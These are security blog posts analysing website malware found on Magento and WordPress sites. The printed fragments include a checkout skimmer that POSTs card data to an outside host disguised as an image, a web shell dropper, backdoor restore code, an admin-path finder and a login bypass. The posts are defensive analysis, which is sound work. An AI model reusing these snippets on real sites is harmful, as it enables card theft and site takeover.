Database and Image Tricks in Magento Malware

Magento malware that steals details of customer credit cards is a prevalent problem during the last couple of years. We write a lot about various modifications of such malware and the tricks hackers use. When you look back, it’s interesting to see how common ideas may be reused in different steps of the attack.


Database

It’s a common trick to inject malware directly into the Magento database, which helps avoid modification of files on the server. The most typical target is the design/head/includes rows of the core_config_data table. The HTML code from those records is used to build the site pages, so it’s a perfect place for injection of JavaScript code that monitors form input and sends entered data to third-party servers.

Images

Another common theme is using image files to transfer stolen data. Since 2015 (the notorious Visbot malware), we’ve seen many different variations of the server-side malware that would save stolen data in files with image extensions (.jpg, .png, .gif). Files with such extensions raise little suspicion since they are not executable. At the same time, they can be easily downloaded from the compromised sites. Some malware saved the data in plain text. More complex attacks appended the data to existing legitimate image files. Visbot and its "Fake SUPEE-5344 Patch" modification used public keys to encrypt the saved in the .jpg files data, which also helped them make the files look like real binary images.

The "Fake SUPEE-5344 Patch" malware also had a backdoor functionality. It executed arbitrary shell commands passed in the “jpg” request parameter. Apparently, everything related to images is considered benign. Another JavaScript malware sends stolen data to a third-party server, but instead of making a direct AJAX call to that remote URL, it builds an <img> tag with that remote URL as its src parameter. The result is the same, but now it looks as if it’s loading an image from a remote server, not sending data to a remote server.

Recently, we came across a combination of all the above tricks. An obfuscated script was found in the design/footer/absolute_footer row of the core_config_data table.

<script>
this["eval"]("%:){(-7{^-&//`\n5&-8\'2,-{(\':)\'sr \n{{...skipped
...String(A).split("").reverse().join("");return H.charAt(A.indexOf(W))}));
</script>

Once decoded, it was clear that it steals data from Magento checkout pages

if((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) { ...

And sends it to a remote hacked site:

...
if(cc.test(snd)){ asd="1" ; } 
var http = new XMLHttpRequest(); 
http.open("POST","https://<hacked-site>/lib/paypal_icon.jpg",true); 
http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
http.send("data="+snd+"&asd="+asd+"&id_id=infected-site.com"); 
...

The URL of the remote script looks like a URL of an image file: https:///lib/paypal_icon.jpg. One might think that the script loads a PayPal icon for the checkout page. Of course it makes little sense. And when you notice that the script uses the POST method to open that “image” and passes form data as parameters, it becomes clear that paypal_icon.jpg is not an image - it’s a server-side script that pretends to be an image (most likely either using using .htaccess tricks like mod_rewrite or changing the handler and MIME type for the .jpg extension inside the /lib directory).

This malware reminds us once again that we should not trust any code, requests, or files just because they are related (or seem to be related) to images. And don’t limit your malware scans to files on server. Most modern CMS can’t work without a database and the databases are a common target for infections.

For more information about security issues of Magento and other ecommerce platforms, please check the Ecommerce security section of our blog. If you need someone to clean and protect your site, you can count on us.

Jan 10, 2017 by Denis Sinegubko

Spamming Stopped by Pastebin

We wrote multiple times about malware attacks that store their scripts on Pastebin.com and load them either to the server once they break into it or directly to the infected web pages

However Pastebin.com can’t be called a reliable hosting for malware. You can report any paste and it will be removed if Pastebin.com finds it inacceptable. For example, when we find that a certain paste is being used in ongoing attacks, we report them.

What happens when a paste is removed from Pastebin.com? Of course, hackers eventually notice it and create new pastes and reconfigure the attack to use them, but for some period of time their attack is disrupted. From time to time we find signs of such disrupted attacks on infected sites. For example, recently our scanner found this file on a hacked site:skin/adminhtml/default/kontools/promailerv2.php.


Despite the .php extension, its content was pure HTML. The title of the page was "Pastebin.com - Page Removed" and the rest of the content was identical to what Pastebin.com returns when you request a removed or expired paste:

This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.

The code of the page contained the URL of the original paste: pastebin[.]com/HqhHiwSB. It was indeed removed. We found its original content in Google’s cache. It, as the filename implies, contained the code of a PHP script called “PRO Mailer V2” - a tool for sending out spam and phishing emails. It was uploaded on September 18, 2016 by someone in East Java, Indonesia, along with some other malicious scripts (shells, defacement, and spam tools).

If you ever come across a malicious campaign that actively uses Pastebin.com, please spend a few moments to report the pastes that it uses. You may help many people. If you ever have a need to publish some malicious (suspicious) code on Pastebin.com or another similar service (e.g. if you found it on your site and need advice), please make it unexecutable by adding some comments at the top, or by making other obvious changes that would prevent it being used in attacks directly off of Pastebin.com. Also consider making such pastes private and expire in a minimal reasonable time.

If you find the "Pastebin.com - Page Removed" files on your server, it’s a strong indication of a hack and you should investigate this issue. Let us know if you need a professional help.

Jan 6, 2017 by Denis Sinegubko

Release the Prisoners – Rename .Suspected Backdoors

When webmasters or hosting companies look for malware, they usually search for encrypted code, encoded payloads, suspicious functions and much more. If they happen to find any of those instances, it’s a common practice to either remove or rename the file in question.

If the file being flagged hits a certain amount of suspicious code or raises red flags based on different variables, hosting companies may rename those files from file.php to file.php.suspected (Appending .suspected in the end) - this way the file loses its ability to be interpreted by the webserver. However, sometimes there are backdoors nearby ready to release the prisoners.

The following code was found during an incident response investigation:

<?php
if (file_exists('wp-rmcc.php.suspected')) {
 chmod('wp-rmcc.php.suspected', 0777);
 rename('wp-rmcc.php.suspected','wp-rmcc.php');
}
@chmod("wp-rmcc.php",0444);
?>

Very short, but interesting snippet that checks if the file wp-rmcc.php.suspected exists. If it does, the code changes its permission to 777 and renames it to wp-rmcc.php, therefore allowing the code to be executed again. It also does one more thing. Have you noticed this last short piece of code?

@chmod("wp-rmcc.php",0444);

It sets the permissions for the file read-only to prevent easy removal of the malicious code. Of course the example above is very simple and targeted to only that particular file, but the script could be easily modified to rename all files with the .suspected extension.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website by having those other small infected files around, even if the obvious backdoor is renamed/blocked. That’s why simply renaming those easy to spot malicious files may not solve the case.

If you need professional help on getting the issues fixed, we’d be happy to assist you!

Jan 3, 2017 by Andrey Kucherov

Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to increase those odds, is injecting a file known as Dropper that downloads the real malware into the system. The Dropper could go undetected for a long time because it usually doesn’t have any obfuscated function, encoding, or anything that is malicious per se. Its sole purpose is to download and write the malware into the system as you can see in the snippet below:  

<?php
if( $z = fopen( 'include4.php', 'w') ) {
 if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
 fclose( $z );
 echo '0';
 } else {
 echo '1';
 }
} else {
 echo '2';
}

If you are unfamiliar with PHP, don’t you worry, the snippet is pretty straightforward. The Dropper tries to download the malware (webshell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed as a result of the request. - the well known exit code in UNIX systems for successful execution of command. If the operation can’t download the webshell, it prints 1; if it can’t create the file in which the shell will resides  it prints 2.  

The following code is the content of the webshell fetched from the 'hxxttp://picasa(dot)commie.msgftw(dot)com/priv8.php' link by the Dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net

Dec 29, 2016 by Yuliyan Tsvetkov

Not that impressive hack tool

There is often a misconception regarding the tools that attackers implement in their malicious activity, and that misconception is that they must be using advanced computer programs to target and exploit other computers.


This is not always true, and it is not uncommon to see simplistic tools used, such as the following:

This tool uses simple PHP coding to create an array of segmented URLs that are then appended to the domain name that is provided by the malicious user. It's commonly known as an admin finder as noted by the web page title (hacker group name removed).

if (isset($_POST["submit_lol"])) {
$url = $_POST['hash_lol'];
echo "<br /> COCOL ".$url."<br /><br />";
 
$adminlocales = array("/adminweb/index.php", "/adminsekolah", "/webmaster", "/operator", "/redaktur", "/moderator", "/login@web", "/admin@web", "/adminlogin", "/loginpanel", "/adminpanel", "/login@web", "/admin1.php", "/adminweb", "/Login",  "/login", "/redaktur", "/redakturweb", "/administrator", "/sika", "/develop", "/ketua", "/author", "/user", "/users",   "/dinkesadmin", "/retel", "/panel", "/paneladmin", "/panellogin", "/redaksi", "/cp-admin", "/master", "/master/index.php",    "/master/login.php", "/operator/index.php", "/sika/index.php", "/develop/index.php", "/ketua/index.php", "/redaktur/index.php",    "/admin/index.php", "/administrator/index.php", "/adminweb/index.php", "/user/index.php", "/users/index.php", "/dinkesadmin/index.php", "/retel/index.php", "/author/index.php", "/panel/index.php", "/paneladmin/index.php", "/panellogin/index.php", "/redaksi/index.php", "/cp-admin/index.php", "/operator/login.php", "/sika/login.php", "/develop/login.php",    "/ketua/login.php", "/redaktur/login.php", "/admin/login.php", "/administrator/login.php", "/adminweb/login.php");
     
foreach ($adminlocales as $admin){
$headers = get_headers("$url$admin");
if (eregi('200', $headers[0])) {
      echo "<a href='$url$admin'>$url$admin</a> >>> KETEMU GAN!<br />";
}
else {
      echo "$url$admin >>> GAK BISA GAN!<br />";
}
}
}

The coding behind the tool itself is almost as simple as the web page it displays. It just captures the domain name through a POST request sent via HTML form, assigns it to the $url variable, then uses a pre-set array of common admin segmented URLs through the $adminlocales variable, and combines the two to complete a full URL. Afterwards, it sends a request and if the request comes back with a valid HTTP "200 OK" code, then it outputs the URL with the Indonesian text "KETEMU GAN!" (I couldn't find an accurate translation, but I assume it's "URL GOOD"). If the web server returns anything other than "200 OK", then it outputs the "GAK BISA GAN!" text.

From there, attackers may use the results of the tool to gain access to administrator interfaces through brute force attempts.

All things considered, it's a very unsophisticated tool and could be much more efficient if run from a terminal with a proxy connection versus a compromised web server.

Dec 27, 2016 by Luke Leal

Malicious script injected to WordPress theme allowing Admin...

On a daily basis we find different kinds of malware like backdoors, credit card stealers, injected scripts, and phishing pages. While each one of those catches our attention, we recently found an interesting WordPress administration login bypass script.


This technique, login bypass, is often used after the website is compromised because attackers can easily access the post, page, and widget section without spending hours trying different username & password combinations in a brute-force attack, for instance.

The malicious script (theme.php) was injected into the theme structure with the intention of blending in with good code and trying to go undetected.

Here is a snippet of the malware:

require('./../../../../../../../wp-blog-header.php');$query_str = "SELECT ID FROM $wpdb->users";…if (user_can($user_id, 'administrator')) {   …    $user_login = $user_info->user_login;   …    do_action('wp_login', $user_login);       echo "You are logged in as $user_login";       if (function_exists('get_admin_url')) {           wp_redirect(get_admin_url());

The code is very straightforward. First, it includes the wp-blog-header.php file that subsequently loads functions from wp-config.php related to login capabilities.

Secondly, the malware checks if the user_id fetched from the database has administrator privileges -the location of ‘wp-admin’ URL location via ‘get_admin_url()’ function. If all these criterias match, the attacker is then redirected (wp_redirect) to the wp-admin URL with administrator access to the backend without sending any username / password combination.

In these types of attacks, we also noticed that bogus admin users may be created into the backend interface. If you suspect of a compromise, or identify a user with administrator privileges that you haven’t created, we highly recommend taking a backup of your database, removing the user and changing the password for all other users.

As a good security practice, users should have access only to the resources they need to, as WordPress implemented this very well through the different roles a user could have in the backend (Subscriber, Editor, Contributor, Author, Administrator, etc.). Make sure to take advantage of this feature and prevent further damage to your website and online presence.

We also recommend having a File Integrity Monitor in place and a Website Firewall to prevent further issues from happening.

Dec 22, 2016 by Yuliyan Tsvetkov

Malicious JavaScript Injected in Plugin Widget

Each and every day the attackers get more clever and exploit new attack vectors. Sucuri Labs recently found a malicious JavaScript hidden in the database of a WordPress website.


The malicious code was injected inside a legit widget of the website:

s:6:"filter";b:1;}i:6;a:3:{s:5:"title";s:0:"";s:4:"text";s:515:"<?php$r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; $h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; $s=base64_decode('PHNjcmlwdCBzcmM9Imh0dHAclVmIj48L3ND4NCg=='); $p = strpos($r, $h); if(($p===false)&&($r<>'')){echo $s;}if(current_user_can('administrator') || current_user_can('editor') || current_user_can('author') || current_user_can('contributor')) {?>

No heavy encoding or obfuscation was used for this attack, just simple base64 encoding. After decoding the strings, we found that it loads malicious JQuery Java script from shorten URL:

<script src="hxxp://g00(.)co/P4YrUf"></script>

That follows to this free JS script hosting website:

hxxp://yourjavascript(.)com/5123133466/jquery-migrate-min-g4.js

which injects spammy iframes inside the widget.

If you think that you are victim of such an attack, check your database for the above encoded strings in base64, update all of your plugins, and check all of your widgets for suspicious activity. You can trust our Security Engineers at https://sucuri.net for checking your website for more malicious code if you are unsure that the infection was cleared.

Dec 20, 2016 by Yuliyan Tsvetkov